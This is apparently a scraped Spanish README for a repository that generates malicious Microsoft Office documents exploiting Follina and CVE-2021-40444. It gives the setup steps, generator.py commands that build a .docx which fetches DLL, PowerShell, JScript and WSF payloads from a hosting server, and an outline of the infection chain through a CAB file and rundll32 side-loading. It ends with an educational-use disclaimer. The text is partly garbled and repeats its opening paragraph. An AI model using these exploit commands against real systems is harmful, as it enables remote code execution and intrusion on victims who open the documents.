
Este repositorio contiene scripts y recursos para explotar las vulnerabilidades Follina CVE y CVE-2021-40444 en Microsoft Office. Los scripts generan archivos de documentos maliciosos que pueden ejecutar código arbitrario en el sistema de destino.
Este repositorio contiene scripts y recursos para explotar las vulnerabilidades Follina y CVE-2021-40444 en Microsoft Office. Los scripts generan archivos de documentos maliciosos que pueden ejecutar código arbitrario en el sistema de destino.
requirements.txt)Configuración de Flare VM:
labpasswordPython y entorno virtual:
git clone https://github.com/basim-ahmad/Follina-CVE-and-CVE-2021-40444.git
cd CVE-2021-40444
virtualenv usando el siguiente comando:
pip install virtualenv
venv:
python -m virtualenv venv
venv\Scripts\activate.bat
pip install -r requirements.txt
Generando el exploit:
python generator.py -u http://192.168.197.132 -P test\calc.dll --host
192.168.197.132 con tu dirección IP.Accediendo al documento generado:
.docx generado estará ubicado en el directorio:
C:\Users\Lab\Desktop\project\CVE-2021-40444\out\document.docx
.docx) se abre.document.xml.rels.%TEMP%Low.rundll32 cargue lateralmente el archivo INF.generator.pycab_parser.pyrequirements.txt.python generator.py -u http://127.0.0.1 -P test\calc.dll --host
python generator.py -u http://127.0.0.1 -P test\calc.ps1 --no-cab --host --convert
python generator.py -u http://127.0.0.1 -P test\calc.js --no-cab --host -t
python generator.py -u http://127.0.0.1 -P test\job-jscript.wsf --no-cab --host -t
Este proyecto es solo para fines educativos. Úsalo de manera responsable y no explotes vulnerabilidades en sistemas para los que no tengas permiso para probar. El mal uso de esta información puede conllevar cargos penales.